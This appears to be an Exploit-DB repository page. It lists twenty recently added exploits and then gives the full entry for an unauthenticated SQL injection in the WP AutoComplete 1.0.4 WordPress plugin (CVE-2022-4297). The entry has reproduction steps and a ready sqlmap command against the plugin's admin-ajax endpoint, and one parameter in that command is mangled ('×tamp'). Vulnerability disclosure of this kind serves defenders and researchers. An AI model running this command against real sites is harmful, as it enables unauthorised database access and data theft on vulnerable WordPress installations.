ef9b4e5962
20 changes to exploits/shellcodes/ghdb TP-Link TL-WR940N V4 - Buffer OverFlow D-Link DAP-1325 - Broken Access Control Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE) Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE) FuguHub 8.1 - Remote Code Execution GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS) PodcastGenerator 3.2.9 - Blind SSRF via XML Injection POS Codekop v2.0 - Authenticated Remote Code Execution (RCE) Prestashop 8.0.4 - Cross-Site Scripting (XSS) Rukovoditel 3.4.1 - Multiple Stored XSS Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) spip v4.1.10 - Spoofing Admin account Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS) Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS) WBCE CMS 1.6.1 - Open Redirect & CSRF WebsiteBaker v2.13.3 - Directory Traversal WebsiteBaker v2.13.3 - Stored XSS WP AutoComplete 1.0.4 - Unauthenticated SQLi
24 lines
No EOL
992 B
Text
24 lines
No EOL
992 B
Text
# Exploit Title: WP AutoComplete 1.0.4 - Unauthenticated SQLi
|
|
# Date: 30/06/2023
|
|
# Exploit Author: Matin nouriyan (matitanium)
|
|
# Version: <= 1.0.4
|
|
# CVE: CVE-2022-4297
|
|
Vendor Homepage: https://wordpress.org/support/plugin/wp-autosearch/
|
|
# Tested on: Kali linux
|
|
|
|
---------------------------------------
|
|
|
|
|
|
The WP AutoComplete Search WordPress plugin through 1.0.4 does not sanitise
|
|
and escape a parameter before using it in a SQL statement via an AJAX available to unauthenticated users,
|
|
leading to an unauthenticated SQL injection
|
|
|
|
--------------------------------------
|
|
|
|
How to Reproduce this Vulnerability:
|
|
|
|
1. Install WP AutoComplete <= 1.0.4
|
|
2. WP AutoComplete <= 1.0.4 using q parameter for ajax requests
|
|
3. Find requests belong to WP AutoComplete like step 5
|
|
4. Start sqlmap and exploit
|
|
5. python3 sqlmap.py -u "https://example.com/wp-admin/admin-ajax.php?q=[YourSearch]&Limit=1000×tamp=1645253464&action=wi_get_search_results&security=[xxxx]" --random-agent --level=5 --risk=2 -p q |